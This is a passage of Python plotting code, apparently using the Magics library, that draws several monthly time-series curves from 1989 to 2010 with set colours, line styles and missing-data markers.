'1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 8.40000000e+00, 8.40000000e+00, 7.70000000e+00,
7.50000000e+00, 6.10000000e+00, 5.40000000e+00,
4.80000000e+00, 5.10000000e+00, 6.20000000e+00,
7.20000000e+00, 7.70000000e+00, 8.10000000e+00,
7.50000000e+00, 7.50000000e+00, 7.80000000e+00,
6.90000000e+00, 5.90000000e+00, 5.20000000e+00,
4.80000000e+00, 4.80000000e+00, 6.10000000e+00,
6.90000000e+00, 7.70000000e+00, 7.90000000e+00,
7.70000000e+00, 7.70000000e+00, 7.40000000e+00,
6.90000000e+00, 5.90000000e+00, 5.10000000e+00,
4.80000000e+00, 5.20000000e+00, 5.50000000e+00,
7.00000000e+00, 6.90000000e+00, 8.00000000e+00,
7.60000000e+00, 7.40000000e+00, 7.20000000e+00,
6.60000000e+00, 6.00000000e+00, 5.60000000e+00,
5.00000000e+00, 5.00000000e+00, 5.90000000e+00,
6.30000000e+00, 7.50000000e+00, 8.00000000e+00,
8.90000000e+00, 7.90000000e+00, 7.90000000e+00,
6.70000000e+00, 5.90000000e+00, 5.10000000e+00,
4.70000000e+00, 5.10000000e+00, 5.80000000e+00,
6.90000000e+00, 7.70000000e+00, 7.40000000e+00,
7.50000000e+00, 8.30000000e+00, 7.60000000e+00,
6.70000000e+00, 5.50000000e+00, 5.50000000e+00,
4.90000000e+00, 4.90000000e+00, 5.80000000e+00,
6.10000000e+00, 7.50000000e+00, 7.60000000e+00,
7.80000000e+00, 7.60000000e+00, 7.70000000e+00,
6.50000000e+00, 5.70000000e+00, 5.40000000e+00,
4.90000000e+00, 4.70000000e+00, 5.90000000e+00,
6.30000000e+00, 8.00000000e+00, 6.70000000e+00,
8.00000000e+00, 7.70000000e+00, 7.70000000e+00,
6.10000000e+00, 5.70000000e+00, 4.80000000e+00,
4.40000000e+00, 4.80000000e+00, 5.60000000e+00,
6.50000000e+00, 7.40000000e+00, 7.70000000e+00,
8.00000000e+00, 7.10000000e+00, 6.80000000e+00,
6.30000000e+00, 5.70000000e+00, 5.10000000e+00,
4.30000000e+00, 4.80000000e+00, 5.90000000e+00,
6.40000000e+00, 7.40000000e+00, 7.70000000e+00,
7.60000000e+00, 7.50000000e+00, 7.20000000e+00,
6.20000000e+00, 5.60000000e+00, 4.70000000e+00,
4.30000000e+00, 4.40000000e+00, 5.80000000e+00,
6.70000000e+00, 6.70000000e+00, 8.00000000e+00,
7.90000000e+00, 8.00000000e+00, 6.90000000e+00,
6.90000000e+00, 5.70000000e+00, 5.10000000e+00,
4.60000000e+00, 4.60000000e+00, 5.90000000e+00,
6.70000000e+00, 7.80000000e+00, 7.40000000e+00,
7.40000000e+00, 6.70000000e+00, 6.60000000e+00,
6.00000000e+00, 5.40000000e+00, 4.90000000e+00,
4.40000000e+00, 4.20000000e+00, 1.70000000e+38,
6.10000000e+00, 6.20000000e+00, 6.90000000e+00,
6.70000000e+00, 7.00000000e+00, 6.30000000e+00,
6.00000000e+00, 5.10000000e+00, 4.80000000e+00,
4.20000000e+00, 4.50000000e+00, 5.40000000e+00,
6.10000000e+00, 6.10000000e+00, 6.70000000e+00,
6.67000000e+00, 7.08000000e+00, 6.99000000e+00,
6.14000000e+00, 5.16000000e+00, 4.45000000e+00,
4.50000000e+00, 4.34000000e+00, 5.24000000e+00,
5.41000000e+00, 5.89000000e+00, 6.83000000e+00,
6.63000000e+00, 6.15000000e+00, 1.70000000e+38,
5.69000000e+00, 5.41000000e+00, 4.38000000e+00,
4.29000000e+00, 4.26000000e+00, 5.34000000e+00,
5.99000000e+00, 6.05000000e+00, 6.56000000e+00,
6.45000000e+00, 5.97000000e+00, 6.02000000e+00,
5.56000000e+00, 4.64000000e+00, 4.40000000e+00,
3.71000000e+00, 4.22000000e+00, 4.97000000e+00,
5.68000000e+00, 6.16000000e+00, 6.22000000e+00,
6.12000000e+00, 5.82000000e+00, 5.63000000e+00,
5.06000000e+00, 4.61000000e+00, 4.12000000e+00,
3.82000000e+00, 3.91000000e+00, 4.71000000e+00,
5.35000000e+00, 5.61000000e+00, 5.85000000e+00,
6.02000000e+00, 5.78000000e+00, 5.83000000e+00,
4.79000000e+00, 4.42000000e+00, 3.98000000e+00,
4.16000000e+00, 3.54000000e+00, 4.64000000e+00,
5.20000000e+00, 5.91000000e+00, 5.93000000e+00,
5.87000000e+00, 5.78000000e+00, 5.48000000e+00,
4.87000000e+00, 4.55000000e+00, 3.87000000e+00,
3.40000000e+00, 3.71000000e+00, 1.70000000e+38,
4.94000000e+00, 6.11000000e+00, 5.56000000e+00,
5.49000000e+00, 5.69000000e+00, 4.74000000e+00,
4.79000000e+00, 4.20000000e+00, 3.97000000e+00,
3.63000000e+00, 3.66000000e+00, 4.02000000e+00,
4.99000000e+00, 4.60000000e+00, 5.46000000e+00,
5.15000000e+00, 5.09000000e+00, 5.56000000e+00,
4.21000000e+00, 4.15000000e+00, 3.68000000e+00,
3.51000000e+00, 3.48000000e+00, 4.01000000e+00,
4.78000000e+00, 5.22000000e+00, 5.27000000e+00,
5.22000000e+00, 5.03000000e+00, 5.00000000e+00,
4.48000000e+00, 3.94000000e+00, 3.55000000e+00,
3.47000000e+00, 3.50000000e+00, 4.02000000e+00,
4.48000000e+00, 5.26000000e+00, 5.22000000e+00])) #264
mpp.setc('graph_missing_data_colour','brick')
mpp.seti('graph_symbol_marker_index',2)
mpp.setc('graph_symbol_colour','brick')
mpp.setc('graph_missing_data_style','chain_dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','chain_dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','blue')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 5.60000000e+00, 5.50000000e+00, 5.00000000e+00,
5.00000000e+00, 4.30000000e+00, 4.00000000e+00,
3.70000000e+00, 3.70000000e+00, 1.70000000e+38,
4.60000000e+00, 5.00000000e+00, 5.80000000e+00,
5.60000000e+00, 5.30000000e+00, 5.30000000e+00,
4.80000000e+00, 4.60000000e+00, 4.00000000e+00,
3.60000000e+00, 3.70000000e+00, 4.20000000e+00,
4.60000000e+00, 5.30000000e+00, 5.80000000e+00,
5.50000000e+00, 5.60000000e+00, 5.20000000e+00,
5.10000000e+00, 4.60000000e+00, 3.70000000e+00,
3.50000000e+00, 3.50000000e+00, 4.10000000e+00,
5.00000000e+00, 4.70000000e+00, 5.90000000e+00,
5.60000000e+00, 5.30000000e+00, 5.40000000e+00,
4.60000000e+00, 4.20000000e+00, 3.80000000e+00,
3.40000000e+00, 3.50000000e+00, 4.40000000e+00,
4.60000000e+00, 5.30000000e+00, 5.70000000e+00,
5.70000000e+00, 5.70000000e+00, 5.30000000e+00,
4.20000000e+00, 3.90000000e+00, 3.40000000e+00,
3.10000000e+00, 3.30000000e+00, 3.70000000e+00,
4.40000000e+00, 5.20000000e+00, 5.20000000e+00,
5.40000000e+00, 5.70000000e+00, 5.10000000e+00,
4.50000000e+00, 3.80000000e+00, 3.50000000e+00,
3.10000000e+00, 3.20000000e+00, 3.70000000e+00,
4.20000000e+00, 4.90000000e+00, 5.20000000e+00,
5.00000000e+00, 4.40000000e+00, 4.30000000e+00,
3.90000000e+00, 3.40000000e+00, 3.30000000e+00,
2.90000000e+00, 3.00000000e+00, 3.50000000e+00,
3.80000000e+00, 4.30000000e+00, 4.10000000e+00,
4.70000000e+00, 4.80000000e+00, 4.40000000e+00,
3.70000000e+00, 3.40000000e+00, 3.10000000e+00,
3.00000000e+00, 3.10000000e+00, 3.50000000e+00,
4.10000000e+00, 4.10000000e+00, 4.40000000e+00,
4.60000000e+00, 4.30000000e+00, 4.10000000e+00,
3.60000000e+00, 3.40000000e+00, 3.40000000e+00,
2.90000000e+00, 3.10000000e+00, 3.50000000e+00,
3.70000000e+00, 4.20000000e+00, 4.20000000e+00,
4.30000000e+00, 4.10000000e+00, 4.00000000e+00,
3.50000000e+00, 3.30000000e+00, 3.00000000e+00,
2.60000000e+00, 2.80000000e+00, 3.40000000e+00,
3.70000000e+00, 3.90000000e+00, 4.30000000e+00,
4.20000000e+00, 4.40000000e+00, 4.20000000e+00,
3.50000000e+00, 3.00000000e+00, 2.86000000e+00,
2.77000000e+00, 2.65000000e+00, 3.21000000e+00,
3.47000000e+00, 3.62000000e+00, 3.80000000e+00,
4.17000000e+00, 4.05000000e+00, 3.72000000e+00,
3.27000000e+00, 2.88000000e+00, 2.58000000e+00,
2.52000000e+00, 2.51000000e+00, 2.91000000e+00,
3.20000000e+00, 3.45000000e+00, 3.72000000e+00,
3.89000000e+00, 3.76000000e+00, 3.42000000e+00,
3.13000000e+00, 2.75000000e+00, 2.39000000e+00,
2.45000000e+00, 2.53000000e+00, 2.87000000e+00,
2.93000000e+00, 3.39000000e+00, 3.51000000e+00,
3.49000000e+00, 3.37000000e+00, 3.35000000e+00,
3.12000000e+00, 2.68000000e+00, 2.38000000e+00,
2.55000000e+00, 2.38000000e+00, 2.76000000e+00,
2.96000000e+00, 3.10000000e+00, 3.34000000e+00,
3.34000000e+00, 3.15000000e+00, 3.21000000e+00,
2.77000000e+00, 2.59000000e+00, 2.30000000e+00,
2.34000000e+00, 2.36000000e+00, 2.67000000e+00,
3.20000000e+00, 3.13000000e+00, 3.47000000e+00,
3.23000000e+00, 3.26000000e+00, 3.25000000e+00,
2.81000000e+00, 2.53000000e+00, 2.39000000e+00,
2.24000000e+00, 2.43000000e+00, 2.61000000e+00,
2.80000000e+00, 2.92000000e+00, 3.26000000e+00,
3.15000000e+00, 2.99000000e+00, 2.97000000e+00,
2.75000000e+00, 2.39000000e+00, 2.16000000e+00,
2.06000000e+00, 2.17000000e+00, 2.55000000e+00,
2.63000000e+00, 2.93000000e+00, 2.99000000e+00,
3.14000000e+00, 2.98000000e+00, 2.78000000e+00,
2.38000000e+00, 2.24000000e+00, 2.19000000e+00,
2.29000000e+00, 2.22000000e+00, 2.46000000e+00,
1.70000000e+38, 2.72000000e+00, 2.98000000e+00,
2.80000000e+00, 2.72000000e+00, 2.72000000e+00,
2.48000000e+00, 2.16000000e+00, 1.97000000e+00,
1.90000000e+00, 1.96000000e+00, 2.14000000e+00,
2.46000000e+00, 2.77000000e+00, 2.71000000e+00,
2.88000000e+00, 2.87000000e+00, 2.55000000e+00,
2.25000000e+00, 2.16000000e+00, 2.01000000e+00,
1.88000000e+00, 1.82000000e+00, 1.99000000e+00,
2.57000000e+00, 2.51000000e+00, 2.86000000e+00,
2.68000000e+00, 2.58000000e+00, 2.65000000e+00,
2.19000000e+00, 2.08000000e+00, 1.88000000e+00,
1.84000000e+00, 1.86000000e+00, 2.17000000e+00,
2.43000000e+00, 2.35000000e+00, 2.71000000e+00,
2.54000000e+00, 2.47000000e+00, 2.33000000e+00,
2.22000000e+00, 1.95000000e+00, 1.87000000e+00,
1.80000000e+00, 1.84000000e+00, 1.98000000e+00,
2.13000000e+00, 2.26000000e+00, 2.49000000e+00])) #264
mpp.setc('graph_missing_data_colour','blue')
mpp.seti('graph_symbol_marker_index',3)
mpp.setc('graph_symbol_colour','blue')
mpp.setc('graph_missing_data_style','chain_dot')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','chain_dot')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','blue')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 8.00000000e+00, 7.90000000e+00, 7.10000000e+00,
7.00000000e+00, 6.00000000e+00, 5.50000000e+00,
5.00000000e+00, 5.10000000e+00, 1.70000000e+38,
6.70000000e+00, 7.50000000e+00, 8.80000000e+00,
7.90000000e+00, 7.60000000e+00, 8.10000000e+00,
7.40000000e+00, 6.40000000e+00, 5.50000000e+00,
4.90000000e+00, 5.20000000e+00, 5.80000000e+00,
7.00000000e+00, 8.30000000e+00, 8.70000000e+00,
8.10000000e+00, 8.10000000e+00, 7.40000000e+00,
7.60000000e+00, 6.40000000e+00, 5.40000000e+00,
5.10000000e+00, 5.30000000e+00, 6.20000000e+00,
7.70000000e+00, 7.50000000e+00, 9.10000000e+00,
8.40000000e+00, 8.10000000e+00, 7.90000000e+00,
7.10000000e+00, 6.10000000e+00, 5.60000000e+00,
4.70000000e+00, 5.00000000e+00, 6.50000000e+00,
6.90000000e+00, 7.70000000e+00, 8.50000000e+00,
8.50000000e+00, 8.70000000e+00, 8.20000000e+00,
6.60000000e+00, 5.70000000e+00, 5.10000000e+00,
4.80000000e+00, 5.00000000e+00, 5.60000000e+00,
6.50000000e+00, 7.80000000e+00, 7.70000000e+00,
8.30000000e+00, 8.70000000e+00, 7.80000000e+00,
7.20000000e+00, 5.90000000e+00, 5.30000000e+00,
4.60000000e+00, 4.80000000e+00, 5.80000000e+00,
6.60000000e+00, 7.50000000e+00, 7.90000000e+00,
7.90000000e+00, 7.00000000e+00, 6.90000000e+00,
6.30000000e+00, 5.20000000e+00, 5.00000000e+00,
4.40000000e+00, 4.50000000e+00, 5.30000000e+00,
6.20000000e+00, 7.20000000e+00, 6.50000000e+00,
7.40000000e+00, 7.50000000e+00, 7.50000000e+00,
5.90000000e+00, 5.50000000e+00, 4.60000000e+00,
4.40000000e+00, 4.70000000e+00, 5.30000000e+00,
6.80000000e+00, 7.20000000e+00, 6.90000000e+00,
7.80000000e+00, 6.80000000e+00, 6.80000000e+00,
6.00000000e+00, 5.30000000e+00, 5.10000000e+00,
4.40000000e+00, 4.80000000e+00, 5.40000000e+00,
6.40000000e+00, 6.70000000e+00, 6.80000000e+00,
7.00000000e+00, 6.80000000e+00, 6.70000000e+00,
6.00000000e+00, 5.20000000e+00, 4.60000000e+00,
4.20000000e+00, 4.50000000e+00, 6.00000000e+00,
6.10000000e+00, 6.80000000e+00, 7.00000000e+00,
7.20000000e+00, 7.10000000e+00, 6.50000000e+00,
5.80000000e+00, 5.30000000e+00, 4.75000000e+00,
4.38000000e+00, 4.36000000e+00, 5.52000000e+00,
6.10000000e+00, 6.64000000e+00, 6.23000000e+00,
6.83000000e+00, 6.73000000e+00, 6.24000000e+00,
5.71000000e+00, 5.10000000e+00, 4.39000000e+00,
3.95000000e+00, 4.15000000e+00, 4.88000000e+00,
5.51000000e+00, 5.77000000e+00, 6.58000000e+00,
6.74000000e+00, 6.63000000e+00, 5.97000000e+00,
5.57000000e+00, 4.96000000e+00, 4.09000000e+00,
4.09000000e+00, 4.10000000e+00, 5.02000000e+00,
5.10000000e+00, 6.07000000e+00, 6.02000000e+00,
5.93000000e+00, 5.82000000e+00, 5.86000000e+00,
5.64000000e+00, 4.61000000e+00, 4.13000000e+00,
4.31000000e+00, 4.11000000e+00, 5.16000000e+00,
5.10000000e+00, 5.40000000e+00, 6.02000000e+00,
5.74000000e+00, 5.60000000e+00, 5.85000000e+00,
4.96000000e+00, 4.45000000e+00, 3.94000000e+00,
3.84000000e+00, 3.92000000e+00, 4.83000000e+00,
5.45000000e+00, 5.67000000e+00, 6.24000000e+00,
5.65000000e+00, 5.54000000e+00, 5.53000000e+00,
5.04000000e+00, 4.49000000e+00, 4.08000000e+00,
3.53000000e+00, 4.01000000e+00, 4.72000000e+00,
5.37000000e+00, 5.61000000e+00, 5.80000000e+00,
6.00000000e+00, 5.50000000e+00, 5.29000000e+00,
4.91000000e+00, 4.28000000e+00, 3.87000000e+00,
3.59000000e+00, 3.88000000e+00, 4.47000000e+00,
5.04000000e+00, 5.40000000e+00, 5.57000000e+00,
5.73000000e+00, 5.51000000e+00, 5.49000000e+00,
4.37000000e+00, 4.26000000e+00, 3.86000000e+00,
3.94000000e+00, 3.59000000e+00, 4.49000000e+00,
1.70000000e+38, 5.33000000e+00, 5.54000000e+00,
5.02000000e+00, 5.21000000e+00, 4.85000000e+00,
4.81000000e+00, 4.12000000e+00, 3.63000000e+00,
3.14000000e+00, 3.51000000e+00, 3.96000000e+00,
4.68000000e+00, 5.38000000e+00, 5.02000000e+00,
5.22000000e+00, 5.18000000e+00, 4.75000000e+00,
4.47000000e+00, 3.86000000e+00, 3.55000000e+00,
3.35000000e+00, 3.24000000e+00, 3.89000000e+00,
5.03000000e+00, 4.72000000e+00, 5.30000000e+00,
5.04000000e+00, 4.77000000e+00, 5.09000000e+00,
4.22000000e+00, 3.96000000e+00, 3.45000000e+00,
3.29000000e+00, 3.26000000e+00, 4.18000000e+00,
4.73000000e+00, 4.76000000e+00, 5.29000000e+00,
4.66000000e+00, 4.40000000e+00, 4.39000000e+00,
4.20000000e+00, 3.52000000e+00, 3.31000000e+00,
3.20000000e+00, 3.34000000e+00, 3.63000000e+00,
